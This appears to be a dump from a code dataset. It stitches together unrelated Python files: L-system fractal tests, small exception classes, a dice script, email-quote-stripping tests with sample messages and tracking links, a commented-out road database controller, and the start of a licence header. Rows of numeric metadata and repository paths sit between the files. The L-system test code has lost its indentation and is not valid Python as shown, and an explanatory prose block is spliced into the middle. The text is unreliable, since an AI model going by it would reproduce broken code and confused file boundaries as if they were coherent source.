'4-F10-F++F4-F4-F4-F4-F10-F++F4-F4-F4-F4-F10-F++F4-F4-F4-F4-F10-F++'
'F4-F10-F4-F4-F10-F++F4-F++F4-F4-F10-F++F4-F4-F4-F4-F10-F++F4-F',
'Plant_a': 'F[+F]F[-F]F[+F[+F]F[-F]F]F[+F]F[-F]F[-F[+F]F[-F]F]F[+F]F[-F'
']F',
'Plant_b': 'F[+F]F[-F][F][+F[+F]F[-F][F]]F[+F]F[-F][F][-F[+F]F[-F][F]]['
'F[+F]F[-F][F]]',
'Plant_c': 'FF-[-F+F+F]+[+F-F-F]FF-[-F+F+F]+[+F-F-F]-[-FF-[-F+F+F]+[+F-'
'F-F]+FF-[-F+F+F]+[+F-F-F]+FF-[-F+F+F]+[+F-F-F]]+[+FF-[-F+F+F]+[+F-'
'F-F]-FF-[-F+F+F]+[+F-F-F]-FF-[-F+F+F]+[+F-F-F]]',
'Plant_d': 'FFFF[+FF[+F[+X]F[-X]+X]FF[-F[+X]F[-X]+X]+F[+X]F[-X]+X]FFFF['
'-FF[+F[+X]F[-X]+X]FF[-F[+X]F[-X]+X]+F[+X]F[-X]+X]+FF[+F[+X]F[-X]+X'
']FF[-F[+X]F[-X]+X]+F[+X]F[-X]+X',
'Plant_e': 'FFFF[+FF[+F[+X][-X]FX][-F[+X][-X]FX]FFF[+X][-X]FX][-FF[+F[+'
'X][-X]FX][-F[+X][-X]FX]FFF[+X][-X]FX]FFFFFF[+F[+X][-X]FX][-F[+X][-'
'X]FX]FFF[+X][-X]FX',
'Plant_f': 'FFFF-[[FF-[[F-[[X]+X]+F[+FX]-X]+F-[[X]+X]+F[+FX]-X]+FF[+FFF'
'-[[X]+X]+F[+FX]-X]-F-[[X]+X]+F[+FX]-X]+FF-[[F-[[X]+X]+F[+FX]-X]+F-'
'[[X]+X]+F[+FX]-X]+FF[+FFF-[[X]+X]+F[+FX]-X]-F-[[X]+X]+F[+FX]-X]+FF'
'FF[+FFFFFF-[[F-[[X]+X]+F[+FX]-X]+F-[[X]+X]+F[+FX]-X]+FF[+FFF-[[X]+'
'X]+F[+FX]-X]-F-[[X]+X]+F[+FX]-X]-FF-[[F-[[X]+X]+F[+FX]-X]+F-[[X]+X'
']+F[+FX]-X]+FF[+FFF-[[X]+X]+F[+FX]-X]-F-[[X]+X]+F[+FX]-X',
'Putmans_Tattoo': '-FFFF[-FF+FF[-F+FXF+F]+F-FXF-F+FF+FF]+FF-FF[-F+FXF+F'
']+F-FXF-F+FF-FF+FFFF--FFFF[-FF+FF[-F+FXF+F]+F-FXF-F+FF+FF]+FF-FF[-'
'F+FXF+F]+F-FXF-F+FF-FF+FFFF--FFFF[-FF+FF[-F+FXF+F]+F-FXF-F+FF+FF]+'
'FF-FF[-F+FXF+F]+F-FXF-F+FF-FF+FFFF',
'QuadKochIsland': 'F-F+F+FF-F-F+F-F-F+F+FF-F-F+F+F-F+F+FF-F-F+F+F-F+F+F'
'F-F-F+FF-F+F+FF-F-F+F-F-F+F+FF-F-F+F-F-F+F+FF-F-F+F+F-F+F+FF-F-F+F'
'-F-F+F+FF-F-F+F-F-F+F+FF-F-F+F+F-F+F+FF-F-F+F+F-F+F+FF-F-F+FF-F+F+'
'FF-F-F+F-F-F+F+FF-F-F+F-F-F+F+FF-F-F+F+F-F+F+FF-F-F+F-F-F+F+FF-F-F'
'+F-F-F+F+FF-F-F+F+F-F+F+FF-F-F+F+F-F+F+FF-F-F+FF-F+F+FF-F-F+F-F-F+'
'F+FF-F-F+F-F-F+F+FF-F-F+F+F-F+F+FF-F-F+F-F-F+F+FF-F-F+F-F-F+F+FF-F'
'-F+F+F-F+F+FF-F-F+F+F-F+F+FF-F-F+FF-F+F+FF-F-F+F-F-F+F+FF-F-F+F-F-'
'F+F+FF-F-F+F+F-F+F+FF-F-F+F',
'Serpinski_Curve': 'XF-YF-XF+YF+XF+YF+XF-YF-XF',
'Serpinski_Gasket': 'F--F--F--GG--F--F--F--GG--F--F--F--GG--GGGG--F--F-'
'-F--GG--F--F--F--GG--F--F--F--GG--GGGG--F--F--F--GG--F--F--F--GG--'
'F--F--F--GG--GGGG',
'SquareSpikes': 'F17-F34+F17-F17-F17-F34+F17-F34+F17-F34+F17-F17-F17-F3'
'4+F17-F18-F17-F34+F17-F17-F17-F34+F17-F34+F17-F34+F17-F17-F17-F34+'
'F17-F18-F17-F34+F17-F17-F17-F34+F17-F34+F17-F34+F17-F17-F17-F34+F1'
'7-F18-F17-F34+F17-F17-F17-F34+F17-F34+F17-F34+F17-F17-F17-F34+F17-'
'F',
'Terdragon': 'F-F+F-F-F+F+F-F+F',
'Tree1': '1.1.[3-2.2.[3-F][3+F]2.[--F][++F]2.F][3+2.2.[3-F][3+F]2.[--F]'
'[++F]2.F]1.[--2.2.[3-F][3+F]2.[--F][++F]2.F][++2.2.[3-F][3+F]2.[--'
'F][++F]2.F]1.2.2.[3-F][3+F]2.[--F][++F]2.F',
'Tree2': '1.[5+2.[5+F][7-F]-2.[4+F][6-F]-2.[3+F][5-F]-2.F][7-2.[5+F][7-'
'F]-2.[4+F][6-F]-2.[3+F][5-F]-2.F]-1.[4+2.[5+F][7-F]-2.[4+F][6-F]-2'
'.[3+F][5-F]-2.F][6-2.[5+F][7-F]-2.[4+F][6-F]-2.[3+F][5-F]-2.F]-1.['
'3+2.[5+F][7-F]-2.[4+F][6-F]-2.[3+F][5-F]-2.F][5-2.[5+F][7-F]-2.[4+'
'F][6-F]-2.[3+F][5-F]-2.F]-1.2.[5+F][7-F]-2.[4+F][6-F]-2.[3+F][5-F]'
'-2.F',
'Tree3': '1.[--2.[--F][+F]-F][+2.[--F][+F]-F]-2.[--F][+F]-F',
'Twig': '1.[-2.[-F][+F]][+2.[-F][+F]]',
'Two_Ys': '[1.[+2.[+F][-F]][-2.[+F][-F]]]4-1.[+2.[+F][-F]][-2.[+F][-F]]',
'Weed1': 'F[-F]F[+F]F[-F[-F]F[+F]F]F[-F]F[+F]F[+F[-F]F[+F]F]F[-F]F[+F]F',
'Weed2': '1.[-2.[-F]2.[+F]F]1.[+2.[-F]2.[+F]F]2.[-F]2.[+F]F',
'Weed3': '1.[-2.[-F]2.[+F][-F]F]1.[+2.[-F]2.[+F][-F]F][-2.[-F]2.[+F][-F'
']F]2.[-F]2.[+F][-F]F'}
@pytest.mark.parametrize(('rule', 'expected'),
[("X = X+YF+, Y = -FX-Y", {'X': 'X+YF+',
'Y': '-FX-Y'}),
("X : X+yF+; y => -fX-y",
{'X': 'X+YF+', 'Y': '-FX-Y'}),
('X:FX+FX+FXFY-FY-; Y->+FX+FXFY-FY-FY, F= V',
{'F': 'V', 'X': 'FX+FX+FXFY-FY-',
'Y': '+FX+FXFY-FY-FY'}),
('F=|[+F]|[-F]+F', {'F': '|[+F]|[-F]+F'}),
({'X ': ' X+YF+', ' Y': '-FX-Y '},
{'X': 'X+YF+', 'Y': '-FX-Y'})
])
def test_clean_rule(rule, expected):
rule_result = lsys.Lsys.clean_rule(rule)
assert(rule_result == expected)
@pytest.mark.parametrize(('axiom', 'rule', 'depth', 'expected'),
[
("FX", {'X': 'X+YF+', 'Y': '-FX-Y'}, 3, 'FX+YF++-FX-YF++-FX+YF+--FX-YF+'),
("0", {'0': '010', '1': '011'}, 3, '010011010010011011010011010'),
('a', dict(a='a-b', b='+b-a'), 2, 'a-b-+b-a'),
('F', {'F': '||F'}, 2, '1.1.2.2.F'),
('F', {'F': '||F'}, 0, 'F'),
('F', {'F': '||F'}, 1, '1.1.F'),
])
def test_expand(axiom, rule, depth, expected):
result = lsys.Lsys.expand(axiom, rule, depth)
assert(result == expected.replace(".", "|"))
def test_expand_fractal_dict():
fractal_dict = lsys.fractals.Fractal
for n in ['Dragon', 'Terdragon', 'Serpinski_Gasket', 'Tree1', 'SquareSpikes', 'Plant_f']:
f = fractal_dict[n]
axiom = f['axiom'].upper().replace(" ", "")
depth = 2
rule = lsys.Lsys.clean_rule(f['rule'])
result = lsys.Lsys.expand(axiom, rule, depth)
assert(result == result_at_depth_2[n].replace(".", "|"))
@pytest.mark.parametrize(('rule', 'expected'),
[("X ; X+YF+, Y ; -FX-Y", {'X': 'X+YF+',
'Y': '-FX-Y'}),
("X to X+yF+; y to -fX-y",
{'X': 'X+YF+', 'Y': '-FX-Y'}),
('X - FX+FX+FXFY-FY-; Y - +FX+FXFY-FY-FY, F= V',
{'F': 'V', 'X': 'FX+FX+FXFY-FY-',
'Y': '+FX+FXFY-FY-FY'}),
('F is |[+F]|[-F]+F', {'F': '|[+F]|[-F]+F'}),
(['F', '|[+F]|[-F]+F'], {'F': '|[+F]|[-F]+F'})
])
def test_raise_ValueError_clean_rule(rule, expected):
with pytest.raises(ValueError) as e:
rule_result = lsys.Lsys.clean_rule(rule)
def test_raise_MemoryError_process():
dragon = lsys.fractals.Fractal['Dragon']
axiom = dragon['axiom']
rule = lsys.Lsys.clean_rule(dragon['rule'])
depth = 22
with pytest.raises(MemoryError) as e:
string = lsys.Lsys.expand(axiom, rule, depth)
def test_Lsys_setters():
dic = {
"axiom": 'F',
"rule": {'F': 'F-F+F'},
"depth": 3,
"a0": 90,
"da": 120,
"step": 1,
"ds": 1,
"unoise": 0,
"forward": 'F',
"bar": "|",
"right": "+",
"left": "-",
"goto": 'G',
"ignore": 'X',
"memory_check": False,
}
d = lsys.Lsys()
for attr, val in dic.items():
setattr(d, attr, val)
assert hasattr(d, attr)
assert getattr(d, attr) == val
props = [
"vocab",
"commands",
"coords",
"depths",
"x",
"y",
"_bezier_coords",
"_bezier_x",
"_bezier_y",
"string",
"_string_stale",
"_coord_stale",
"_bezier_stale",
]
for p in props:
getattr(d, p)
assert hasattr(d, p)
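The expected strings in these tests come from repeated rule rewriting: each pass replaces every symbol that has a rule with its expansion and copies every other symbol through unchanged. A hand-rolled sketch of that core loop (an independent reimplementation for illustration, not `lsys.Lsys.expand` itself):

```python
# Single-character L-system rewriting: apply the rule table to every
# symbol of the current string, `depth` times.
def expand(axiom, rules, depth):
    s = axiom
    for _ in range(depth):
        s = "".join(rules.get(ch, ch) for ch in s)
    return s

# Dragon-curve rules from the parametrized case above.
print(expand("FX", {"X": "X+YF+", "Y": "-FX-Y"}, 3))
# FX+YF++-FX-YF++-FX+YF+--FX-YF+
```

This reproduces the depth-3 Dragon string asserted in `test_expand`; the library's real `expand` additionally handles multi-character tokens such as `F17` and the `|` bar counting seen in the `'||F'` cases.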
| 41.355856 | 93 | 0.427731 | 1,956 | 9,181 | 1.978528 | 0.0818 | 0.205685 | 0.229457 | 0.232558 | 0.652196 | 0.636693 | 0.623256 | 0.58553 | 0.575711 | 0.549612 | 0 | 0.073314 | 0.203682 | 9,181 | 221 | 94 | 41.542986 | 0.456025 | 0.012308 | 0 | 0.092896 | 0 | 0.382514 | 0.586378 | 0.460536 | 0 | 0 | 0 | 0 | 0.032787 | 1 | 0.032787 | false | 0 | 0.016393 | 0 | 0.04918 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8ef2f42d99c1a591b8f7d8f891b74ac549843b58 | 192 | py | Python | services/traction/api/db/errors.py | ianco/traction | e7c934edd52155489a842066de457fc400eb7372 | [
"Apache-2.0"
] | 12 | 2022-01-29T20:30:03.000Z | 2022-03-29T11:46:14.000Z | services/traction/api/db/errors.py | ianco/traction | e7c934edd52155489a842066de457fc400eb7372 | [
"Apache-2.0"
] | 38 | 2021-11-22T17:52:50.000Z | 2022-03-31T17:52:00.000Z | services/traction/api/db/errors.py | ianco/traction | e7c934edd52155489a842066de457fc400eb7372 | [
"Apache-2.0"
] | 9 | 2021-11-22T18:05:48.000Z | 2022-03-29T11:25:08.000Z | class DoesNotExist(Exception):
"""Raised when entity was not found in database."""
class AlreadyExists(Exception):
"""Raised when entity already exists with matching unique data."""
| 27.428571 | 70 | 0.734375 | 23 | 192 | 6.130435 | 0.782609 | 0.212766 | 0.269504 | 0.35461 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.161458 | 192 | 6 | 71 | 32 | 0.875776 | 0.552083 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
d902275896623efb8f3268c9abbbdfec792f7682 | 43 | py | Python | livestock3d/__init__.py | kmarburger/livestock3d | 767e6bd1b7658357f720e112d550416cb7c45226 | [
"MIT"
] | 1 | 2021-03-05T16:46:30.000Z | 2021-03-05T16:46:30.000Z | livestock3d/__init__.py | kmarburger/livestock3d | 767e6bd1b7658357f720e112d550416cb7c45226 | [
"MIT"
] | 1 | 2018-06-22T11:40:15.000Z | 2018-06-27T16:35:45.000Z | livestock3d/__init__.py | kmarburger/livestock3d | 767e6bd1b7658357f720e112d550416cb7c45226 | [
"MIT"
] | 4 | 2018-03-29T19:41:01.000Z | 2019-12-06T14:06:46.000Z | from . import livestock3d
from . import ssh | 21.5 | 25 | 0.790698 | 6 | 43 | 5.666667 | 0.666667 | 0.588235 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027778 | 0.162791 | 43 | 2 | 26 | 21.5 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d9110c0bfbed6fe6cead147f683fe70c7713477a | 920 | py | Python | 9/9.14/dice.py | singi2016cn/python-scaffold | 274e508d1919da67e599aa73be139800c043bce4 | [
"MIT"
] | null | null | null | 9/9.14/dice.py | singi2016cn/python-scaffold | 274e508d1919da67e599aa73be139800c043bce4 | [
"MIT"
] | null | null | null | 9/9.14/dice.py | singi2016cn/python-scaffold | 274e508d1919da67e599aa73be139800c043bce4 | [
"MIT"
] | null | null | null | """骰子"""
from random import randint
class Die:
"""骰子"""
def __init__(self, side=6):
self.side = side
def roll_die(self):
return randint(1, self.side)
dice = Die()
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
dice = Die(10)
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
dice = Die(20)
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
print(dice.roll_die())
| 18.039216 | 36 | 0.694565 | 153 | 920 | 3.947712 | 0.124183 | 0.359272 | 0.645695 | 0.794702 | 0.822848 | 0.822848 | 0.822848 | 0.822848 | 0.822848 | 0.822848 | 0 | 0.007273 | 0.103261 | 920 | 50 | 37 | 18.4 | 0.724848 | 0.005435 | 0 | 0.769231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051282 | false | 0 | 0.025641 | 0.025641 | 0.128205 | 0.769231 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 11 |
d92d702aa0b7987d164347f91332115771bab3f5 | 4,116 | py | Python | threaded_messages/tests.py | MattBlack85/django-threaded-messages | da86dea6dd854f9ab37201d3953f9d028faa85e9 | [
"MIT"
] | null | null | null | threaded_messages/tests.py | MattBlack85/django-threaded-messages | da86dea6dd854f9ab37201d3953f9d028faa85e9 | [
"MIT"
] | null | null | null | threaded_messages/tests.py | MattBlack85/django-threaded-messages | da86dea6dd854f9ab37201d3953f9d028faa85e9 | [
"MIT"
] | 1 | 2021-01-06T14:41:13.000Z | 2021-01-06T14:41:13.000Z | from django.test import TestCase
from .utils import strip_mail
class UtilsTest(TestCase):
def test_strip_quotes(self):
body = """nyan nyan nyan nyan nyan
nyan nyan nyan nyan nyan
nyan nyan nyan nyan nyan
2011/10/28 Nyan Cat <nyan@nyan.cat>:
> hey guys
> sarete il 31 dicembre con Pascal a Firenze?
> lo spero tanto, nel caso ditemi qualcosa...
>
>>>
>
>>
>"""
body_stripped = """nyan nyan nyan nyan nyan
nyan nyan nyan nyan nyan
nyan nyan nyan nyan nyan
"""
        self.assertEqual(body_stripped.strip(), strip_mail(body).strip())
def test_single_line_quotes(self):
body = 'asfasf\n\nOn Thu, Dec 15, 2011 at 12:42 PM, Fabrizio S. <messaging@email.gidsy.com>wrote:\n\n> [image: Gidsy] New message\n> Hi Fabrizio, Andrew M. sent you a message\n>\n> *blabla*\n> gasg\n>\n> View and reply<http://email.gidsy.com/wf/click?c=e36x8iH5CyW6UFPc7U%2FiBSpwHwOcqQc55u6Od0IAvnJWLQwR0RdOslgfJYtFkOT0&rp=7%2Bq%2FuBUXPhfnWd079jPZDJw1s3xtQcNITJcDWjO98HB8tJ6%2BYeP23y9SaOFiXvnpboQhDnEJRnrEZfRP9WnHQiL7q9Y0Plign2S9mx7i8%2Bk%3D&u=icfx5E9JS66UPX7QM9UvGw%2Fh0>\n>\n> Sincerely,\n> the *Gidsy team*<http://email.gidsy.com/wf/click?c=nun%2FbaehJTxhIK1KvYwhU5Tg16XMq0b2DKd6IxvO%2F%2Bw%3D&rp=7%2Bq%2FuBUXPhfnWd079jPZDJw1s3xtQcNITJcDWjO98HB8tJ6%2BYeP23y9SaOFiXvnpboQhDnEJRnrEZfRP9WnHQiL7q9Y0Plign2S9mx7i8%2Bk%3D&u=icfx5E9JS66UPX7QM9UvGw%2Fh1>\n>\n> This email was intended for fabrizio@gidsy.com. If you do not want to\n> receive emails like this from staging.gidsy.com<http://email.gidsy.com/wf/click?c=e36x8iH5CyW6UFPc7U%2FiBY72qxV4NIiQfC%2BfF%2BpSEec%3D&rp=7%2Bq%2FuBUXPhfnWd079jPZDJw1s3xtQcNITJcDWjO98HB8tJ6%2BYeP23y9SaOFiXvnpboQhDnEJRnrEZfRP9WnHQiL7q9Y0Plign2S9mx7i8%2Bk%3D&u=icfx5E9JS66UPX7QM9UvGw%2Fh2>anymore, then please change your Email\n> notification settings <http://notice-email-setting/>.\n>\n> Copyright \ufffd 2011 Gidsy.com, All rights reserved.\n>\n'
body_stripped = "asfasf"
        self.assertEqual(body_stripped.strip(), strip_mail(body).strip())
def test_strip_signature(self):
body = 'signature test\n\nOn Fri, Dec 16, 2011 at 11:06 AM, Fabrizio Sestito <fabrizio@gidsy.com>wrote:\n\n> test\n>\n> asd\n>\n>\n> On Fri, Dec 16, 2011 at 11:05 AM, Fabrizio Sestito <fabrizio@gidsy.com>wrote:\n>\n>> hey\n>>\n>>\n>> On Thu, Dec 15, 2011 at 4:08 PM, Fabrizio S. <messaging@email.gidsy.com>wrote:\n>>\n>>> [image: Gidsy] New message\n>>> Hi Fabrizio, Andrew M. sent you a message\n>>>\n>>> *sdfsdf*\n>>> sadasdasdasd\n>>>\n>>> View and reply<http://email.gidsy.com/wf/click?c=e36x8iH5CyW6UFPc7U%2FiBSpwHwOcqQc55u6Od0IAvnLUol8UpZle1eFZgQF40o%2FA&rp=7%2Bq%2FuBUXPhfnWd079jPZDJw1s3xtQcNITJcDWjO98HC6dm1r92yU0SpAJEPbb%2B6TYHFx5ZDq5B8IwoyftFTyY2YZCtQ%2F66rRPRshi2lf8V8%3D&u=wYte5RSXQ3KUXaXN31g4LQ%2Fh0>\n>>>\n>>> Sincerely,\n>>> the *Gidsy team*<http://email.gidsy.com/wf/click?c=nun%2FbaehJTxhIK1KvYwhU5Tg16XMq0b2DKd6IxvO%2F%2Bw%3D&rp=7%2Bq%2FuBUXPhfnWd079jPZDJw1s3xtQcNITJcDWjO98HC6dm1r92yU0SpAJEPbb%2B6TYHFx5ZDq5B8IwoyftFTyY2YZCtQ%2F66rRPRshi2lf8V8%3D&u=wYte5RSXQ3KUXaXN31g4LQ%2Fh1>\n>>>\n>>> This email was intended for fabrizio@gidsy.com. If you do not want to\n>>> receive emails like this from staging.gidsy.com<http://email.gidsy.com/wf/click?c=e36x8iH5CyW6UFPc7U%2FiBY72qxV4NIiQfC%2BfF%2BpSEec%3D&rp=7%2Bq%2FuBUXPhfnWd079jPZDJw1s3xtQcNITJcDWjO98HC6dm1r92yU0SpAJEPbb%2B6TYHFx5ZDq5B8IwoyftFTyY2YZCtQ%2F66rRPRshi2lf8V8%3D&u=wYte5RSXQ3KUXaXN31g4LQ%2Fh2>anymore, then please change your Email\n>>> notification settings <http://notice-email-setting/>.\n>>>\n>>> Copyright \ufffd 2011 Gidsy.com, All rights reserved.\n>>>\n>>\n>>\n>\n\n\n-- \nFabrizio Sestito\n'
body_stripped = "signature test"
        self.assertEqual(body_stripped.strip(), strip_mail(body).strip())
def test_no_signature(self):
pass
#TODO: add support for stripped html
#body = '<div>I am some nasty html</div>'
#body_stripped = "I am some nasty html"
#self.assertEquals(body_stripped.strip(), strip_mail(body).strip())
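The behaviour these tests pin down — drop quoted `>` lines, drop the "On … wrote:" or "YYYY/MM/DD …:" attribution header, and cut everything after a `-- ` signature marker — can be sketched in a few lines. This is a simplified stand-in for `strip_mail`'s observable behaviour, not its implementation (real attribution headers can wrap across lines, which this toy version ignores):

```python
import re

# Toy reply/quote stripper mirroring the assertions above.
def strip_quotes(body):
    kept = []
    for line in body.splitlines():
        if line.lstrip().startswith(">"):
            continue  # quoted reply content
        if re.match(r"^(On .+ wrote:|\d{4}/\d{2}/\d{2} .+:)\s*$", line):
            continue  # reply attribution header
        if line.strip() == "--":
            break  # start of the signature block
        kept.append(line)
    return "\n".join(kept).strip()

print(strip_quotes("asfasf\n\nOn Thu, Dec 15 someone wrote:\n> quoted\n> more"))
```

Printing `asfasf` here matches the expectation in `test_single_line_quotes`; the commented-out `test_no_signature` body hints that HTML input would still need separate handling.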
| 72.210526 | 1,593 | 0.741983 | 540 | 4,116 | 5.614815 | 0.288889 | 0.076517 | 0.102902 | 0.126649 | 0.810686 | 0.790897 | 0.778694 | 0.778694 | 0.778694 | 0.644459 | 0 | 0.095251 | 0.130224 | 4,116 | 56 | 1,594 | 73.5 | 0.751676 | 0.043489 | 0 | 0.225806 | 0 | 0.064516 | 0.832443 | 0.050598 | 0 | 0 | 0 | 0.017857 | 0.096774 | 1 | 0.129032 | false | 0.032258 | 0.064516 | 0 | 0.225806 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
d95ed8ca89a8e32c527f194d3bb84298b5bdb65c | 4,377 | py | Python | Controllers/cont_ms_roadbase.py | acadianshadow237/BA_MDI1 | 73e0e87c15ff083ce860f7a09fa2de3a3c71c215 | [
"MIT"
] | null | null | null | Controllers/cont_ms_roadbase.py | acadianshadow237/BA_MDI1 | 73e0e87c15ff083ce860f7a09fa2de3a3c71c215 | [
"MIT"
] | null | null | null | Controllers/cont_ms_roadbase.py | acadianshadow237/BA_MDI1 | 73e0e87c15ff083ce860f7a09fa2de3a3c71c215 | [
"MIT"
] | null | null | null |
# import Models.my_tables_model as db_mbm  # only needed by the commented-out helpers below
import cont_RoadBase.viewmodels as rb  # required by the active getAllRecords() query
#----------------------------------------------------------------------
def getAllRecords(session):
"""
Get all records and return them
"""
result = session.query(rb.VBase).order_by(rb.VBase.Name,rb.VBase.From).all()
return result
#def getOneRecordBy_id(session,m_id):
# """
# Get one record and return it based on its id
# """
# result = session.query(rb.VBase).filter_by(id = m_id).all()
# return result
#def getRecordBy_RoadName(session,m_RoadName):
# """
# Get one record and return it based on its RoadName
# """
# result = session.query(rb.VBase).filter_by(Name = m_RoadName).order_by(rb.VBase.From).all()
# return result
#def addNewRecord(session,m_data):
# b1= db_mbmBase(
# id = m_data.id,
# Name = m_data.Name,
# SelectRole = m_data.SelectRole,
# UpDateRole = m_data.UpDateRole,
# DeleteRole = m_data.DeleteRole,
# Route_Class = m_data.Route_Class,
# Route_ID = m_data.Route_ID,
# Pass_Direction = m_data.Pass_Direction,
# Inventory_Number = m_data.Inventory_Number,
# id_1 = m_data.id_1,
# Street_Name = m_data.Street_Name,
# zz_Deighton_Fix = m_data.zz_Deighton_Fix,
# data_accum_direction = m_data.data_accum_direction,
# County = m_data.County,
# Segment_Number = m_data.Segment_Number )
# c1 = db_mbmChunk(
# id = m_data.ChunkID,
# Length = m_data.Length,
# Geo = m_data.Map)
# bc1 = db_mbmBaseChunk(
# id = m_data.NetworkID,
# lprid = m_data.id,
# ChunkID = m_data.ChunkID,
# FromMeasure = m_data.FromMeasure,
# ToMeasure = m_data.ToMeasure,
# From = m_data.From,
# To = m_data.To,
# ValidOn = m_data.ValidOn,
# ValidTo = m_data.ValidTo,
# CreatedOn = m_data.CreatedOn,
# EndedOn = m_data.EndedOn,
# Map = m_data.Map,
# Offset = m_data.Offset,
# End = m_data.End)
# session.add(b1)
# session.add(c1)
# session.add(bc1)
# session.commit()
#def deleteRecordByID(session,m_id):
# """
# delete a single record by id
# """
# r1=session.query(rb.VBase).filter(id == m_id).one()
# b1 = session.query(db_mbmBase).filter(id == r1.id)
# c1 = session.query(db_mbmChunk).filter(id == r1.ChunkID)
# bc1 = session.query(db_mbmBaseChunk).filter(id == r1.NetworkID)
# session.delete(b1)
# session.delete(c1)
# session.delete(bc1)
# session.commit()
#def upDateRecord(session,m_id,m_data):
# vb1 = session.query(rb.VBase).filter(id == m_id).one()
# b1 = session.query(db_mbmBase).filter(id == vb1.id)
# c1 = session.query(db_mbmChunk).filter(id == vb1.ChunkID)
# bc1 = session.query(db_mbmBaseChunk).filter(id == vb1.NetworkID)
# b1= db_mbmBase(
# id = m_data.id,
# Name = m_data.Name,
# SelectRole = m_data.SelectRole,
# UpDateRole = m_data.UpDateRole,
# DeleteRole = m_data.DeleteRole,
# Route_Class = m_data.Route_Class,
# Route_ID = m_data.Route_ID,
# Pass_Direction = m_data.Pass_Direction,
# Inventory_Number = m_data.Inventory_Number,
# id_1 = m_data.id_1,
# Street_Name = m_data.Street_Name,
# zz_Deighton_Fix = m_data.zz_Deighton_Fix,
# data_accum_direction = m_data.data_accum_direction,
# County = m_data.County,
# Segment_Number = m_data.Segment_Number )
# c1 = db_mbmChunk(
# id = m_data.ChunkID,
# Length = m_data.Length,
# Geo = m_data.Map)
# bc1 = db_mbmBaseChunk(
# id = m_data.NetworkID,
# lprid = m_data.id,
# ChunkID = m_data.ChunkID,
# FromMeasure = m_data.FromMeasure,
# ToMeasure = m_data.ToMeasure,
# From = m_data.From,
# To = m_data.To,
# ValidOn = m_data.ValidOn,
# ValidTo = m_data.ValidTo,
# CreatedOn = m_data.CreatedOn,
# EndedOn = m_data.EndedOn,
# Map = m_data.Map,
# Offset = m_data.Offset,
# End = m_data.End)
# session.add(b1)
# session.add(c1)
# session.add(bc1)
# session.commit()
| 29.979452 | 85 | 0.581677 | 548 | 4,377 | 4.390511 | 0.162409 | 0.137157 | 0.026185 | 0.039485 | 0.814214 | 0.785536 | 0.785536 | 0.785536 | 0.720698 | 0.66251 | 0 | 0.01049 | 0.281243 | 4,377 | 145 | 86 | 30.186207 | 0.754291 | 0.898104 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 9 |
794cf051ead9cd18c6781a5e58b461962fdf1b22 | 14,699 | py | Python | services/common/tests/slots/test_merge.py | rtubio/server | 3bb15f4d4dcd543d6f95d1fda2cb737de0bb9a9b | [
"Apache-2.0"
] | 4 | 2015-03-23T16:34:53.000Z | 2017-12-12T11:41:54.000Z | services/common/tests/slots/test_merge.py | rtubio/server | 3bb15f4d4dcd543d6f95d1fda2cb737de0bb9a9b | [
"Apache-2.0"
] | 42 | 2015-01-08T22:21:04.000Z | 2021-12-13T19:48:44.000Z | services/common/tests/slots/test_merge.py | rtubio/server | 3bb15f4d4dcd543d6f95d1fda2cb737de0bb9a9b | [
"Apache-2.0"
] | 2 | 2015-04-04T15:23:35.000Z | 2017-07-23T23:14:06.000Z | """
Copyright 2013, 2014 Ricardo Tubio-Pardavila
